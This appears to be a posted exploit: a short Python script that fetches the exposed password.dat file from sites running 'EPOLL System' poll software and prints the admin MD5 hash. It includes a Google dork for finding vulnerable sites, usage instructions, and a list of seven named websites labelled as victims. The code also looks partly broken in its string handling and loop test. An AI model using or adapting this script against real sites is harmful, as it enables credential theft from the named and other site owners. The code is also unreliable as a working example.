EPOLL System password.dat disclosure exploit.
9c58560b93b1ac1393241e73c9b0cc3e6c62f2ad0b19cb3a82ae1129fd1cf7c2
#!/usr/bin/python
#Portal Name: EPOLL SYSTEM
#Version : All version
#'Google Dork : Powered by Egorix
#Exploit Coded by: Pouya_Server
#Exploit Discovered by: Pouya_Server
#Contact Me : Pouya.s3rver@Gmail.com
#Epoll system login page = www.site.com/[Path]/admin.php
import urllib
import sys
import parser
serv="https://"
i=0
for arg in sys.argv:
i=i+1
if i!=3:
print """\n\n
\tEpoll System (password.dat)
\tUsage:exploit.py [targetsite] [path]
\tExample:exploit.py www.target.com /Path/
\tResult= Admin Pass [MD5]" \n\n"""
else:
adres=sys.argv[1]
path=sys.argv[2]
str1=adres.join([serv,path])
str2=str1.join(['','/password.dat'])
print "\n[~]Connecting..."
url=urllib.urlopen(str2).read();
print "\n[+]Connected!"
test=url.find(path);
t=0;
print "\n\t\t\t-=[Admin Password]=-"
while(url[test+1]!=1): # Pouya
print url[test],
if(url[test]=='\n'):
t=t+1;
if(t==2):
break;
test=test+1;
print "\n\n\t\t\t[ Coded by Pouya_Server ]"
------------------------------------------------------------------------------------------
Victem :
https://www.domivka.net/poll
https://asadullin.ru/vote
https://www.svatovo.ws/poll
https://www.xk3.ru/vote
https://kudrev.oblhospital.com.ua/vote2
https://www.most-tv.ru/pool
https://www.srkc.ru